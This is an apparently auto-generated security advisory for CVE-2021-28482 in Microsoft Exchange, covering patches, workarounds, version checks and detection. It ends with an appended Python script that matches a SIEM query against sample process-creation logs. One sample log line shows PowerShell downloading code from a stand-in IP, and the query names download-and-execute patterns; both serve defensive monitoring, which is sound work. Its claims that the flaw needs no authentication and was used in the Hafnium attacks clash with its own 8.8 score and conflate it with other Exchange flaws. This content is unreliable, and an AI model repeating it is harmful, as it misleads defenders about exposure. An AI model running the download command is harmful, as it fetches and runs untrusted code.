CVE-2021-28482

8.8 HIGH

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary code on Microsoft Exchange Server without authentication. It affects organizations running vulnerable Exchange Server versions, potentially exposing email communications and server control.

💻 Affected Systems

Products:
  • Microsoft Exchange Server
Versions: Exchange Server 2013, 2016, 2019
Operating Systems: Windows Server
Default Config Vulnerable: ⚠️ Yes
Notes: All supported Exchange Server versions are affected. Exchange Online is not affected.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Full compromise of Exchange Server leading to data exfiltration, ransomware deployment, and persistent backdoor access to corporate email systems.

🟠 Likely Case: Unauthenticated attackers gaining an initial foothold on Exchange Server, enabling further lateral movement and data theft.

🟢 If Mitigated: Attack blocked at the network perimeter or detected before code execution completes.

🌐 Internet-Facing: HIGH - Exchange servers are often internet-facing for email access, making them prime targets.
🏢 Internal Only: MEDIUM - Internal attackers could exploit if network segmentation is weak.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

This vulnerability was actively exploited in the wild as part of the Hafnium attacks. Exploitation requires no authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Security updates for Exchange Server 2013 CU23, 2016 CU19, 2019 CU8 and later

Vendor Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28482

Restart Required: Yes

Instructions:

1. Download the appropriate security update from the Microsoft Update Catalog.
2. Install the update on all Exchange servers.
3. Restart Exchange services or the server as required.
4. Verify installation via the Exchange Management Shell: Get-ExchangeServer | Format-List Name, Edition, AdminDisplayVersion

🔧 Temporary Workarounds

Block HTTP/HTTPS access to Exchange Server (windows)
Temporarily restrict external access to Exchange Server while patching.
Action: Use firewall rules to block ports 443 and 80 from external networks.

Enable Windows Defender Antivirus (windows)
Ensure real-time protection is active to detect exploitation attempts.
Check: Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled

🧯 If You Can't Patch

  • Isolate Exchange Server from internet using firewall rules
  • Implement network segmentation to limit lateral movement from Exchange Server

🔍 How to Verify

Check if Vulnerable:

Check the Exchange Server version with Get-ExchangeServer | Format-List Name, Edition, AdminDisplayVersion. If the AdminDisplayVersion is below the patched CU level for that Exchange branch, the system is vulnerable.

Check Version:

Get-ExchangeServer | Format-List Name, Edition, AdminDisplayVersion

Verify Fix Applied:

Verify that the security update is installed: Get-HotFix | Where-Object {$_.Description -like '*Exchange*'}. Then confirm that the version reported by Get-ExchangeServer is at or above the patched CU level.

📡 Detection & Monitoring

Log Indicators:

  • Unusual PowerShell execution from Exchange Server
  • Suspicious IIS logs showing exploitation patterns
  • Event ID 4688 with suspicious process creation

Network Indicators:

  • Unusual outbound connections from Exchange Server
  • HTTP requests to suspicious external IPs

SIEM Query:

source="Exchange" AND (process="powershell.exe" OR cmdline="*Invoke-*" OR cmdline="*DownloadString*")
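As an added example (not part of this advisory), the checker below applies the SIEM query above to Event ID 4688 records forwarded as key=value lines and reports which clause fired so an analyst can triage the hit. The sample lines, host names and the NewProcessName/CommandLine field names are constructed assumptions about the collector's format.

```python
import re
from typing import Dict, List

# Constructed key=value lines (not real telemetry) in the shape a collector might
# forward from the Security log of an Exchange host (Event ID 4688, new process).
SAMPLE_LOG = r"""
host=EXCH01 source=Exchange EventID=4688 NewProcessName="C:\Windows\System32\inetsrv\w3wp.exe" CommandLine="w3wp.exe -ap MSExchangeOWAAppPool"
host=EXCH01 source=Exchange EventID=4688 NewProcessName="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -nop -w hidden -EncodedCommand REDACTED"
host=EXCH01 source=Exchange EventID=4688 NewProcessName="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe /c powershell -c (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x')"
host=EXCH01 source=Exchange EventID=4688 NewProcessName="C:\Program Files\PowerShell\7\pwsh.exe" CommandLine="pwsh.exe -c Invoke-Expression (Get-Content C:\t.ps1)"
host=FS01 source=FileServer EventID=4688 NewProcessName="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -File nightly-backup.ps1"
"""

# key=value pairs; values are either double-quoted (may contain spaces) or bare.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one forwarded line into a dict keyed by the SIEM query's field names."""
    fields = {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}
    # The query compares the image name only, so reduce the full path to its basename.
    fields["process"] = fields.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
    fields["cmdline"] = fields.get("CommandLine", "")
    return fields


def match_reasons(ev: Dict[str, str]) -> List[str]:
    """Return the query clauses an event satisfies; empty means no alert."""
    if ev.get("source", "").lower() != "exchange":
        return []
    cmd = ev["cmdline"].lower()
    reasons = []
    if ev["process"] == "powershell.exe":
        reasons.append("process=powershell.exe")
    if "invoke-" in cmd:
        reasons.append("cmdline contains Invoke-")
    if "downloadstring" in cmd:
        reasons.append("cmdline contains DownloadString")
    return reasons


def find_alerts(log_text: str) -> List[Dict[str, str]]:
    """Run the query over every line; events from non-Exchange sources never alert."""
    events = (parse_event(line) for line in log_text.strip().splitlines())
    return [ev for ev in events if match_reasons(ev)]


if __name__ == "__main__":
    for ev in find_alerts(SAMPLE_LOG):
        print(ev["host"], ev["process"], "->", ", ".join(match_reasons(ev)))
```

Note that the pwsh.exe line is caught only by the cmdline clause, which is why the query combines the process name with command-line substrings rather than relying on either alone.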
